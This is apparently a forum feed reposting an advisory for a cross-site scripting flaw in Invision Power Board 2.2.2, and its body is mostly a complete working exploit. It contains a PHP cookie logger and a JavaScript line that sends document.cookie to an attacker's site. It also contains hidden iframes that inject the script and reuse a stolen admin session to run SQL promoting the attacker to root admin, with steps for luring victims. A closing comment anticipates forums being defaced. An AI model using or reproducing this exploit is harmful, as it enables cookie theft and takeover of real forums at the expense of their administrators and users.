<![CDATA[Latest posts for the topic "Invision Power Board Cross Site Scripting Vulnerability"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Invision Power Board Cross Site Scripting Vulnerability Invision Power Board Cross Site Scripting Vulnerability ------------------------------------------------------------------------ SUMMARY A vulnerability in Invision Power Board allows remote attackers to cause a cross site scripting vulnerability which in turn can be used to cause the administrator of the form, or any other privileged user to execute arbitrary commands (SQL commands), the following exploit code can be used to test your system for the mentioned vulnerability. DETAILS Vulnerable Systems: * Invision Power Board version 2.2.2 Exploit: Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
#  See:

    var editor_id         = <?php print 
'"'.trim($_REQUEST['editorid']).'";'; ?>
 
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without 
trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root 
admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: 
".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 
src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#  Also create a file in the same directory named "log.txt" and chmod it 
777
#
#  Now, create a file called script.js on your webserver, put this code in 
it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
#  And, last but not least, create a file that combines those two ;)
#  Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<iframe border=0 
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Now, post a message on the forum or send a pm to your target with the 
link to the html page.
#  If a normal user views the page, his cookies
#  will be logged, funny. If an admin visits the page and he has an 
admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).
ADDITIONAL INFORMATION The information has been provided by Iron. The original article can be found at: http://www.ironwarez.info Comment: sắp sửa có một loạt IBP bị phá hoại.]]>
/hvaonline/posts/list/10965.html#63100 /hvaonline/posts/list/10965.html#63100 GMT
Invision Power Board Cross Site Scripting Vulnerability /hvaonline/posts/list/10965.html#63269 /hvaonline/posts/list/10965.html#63269 GMT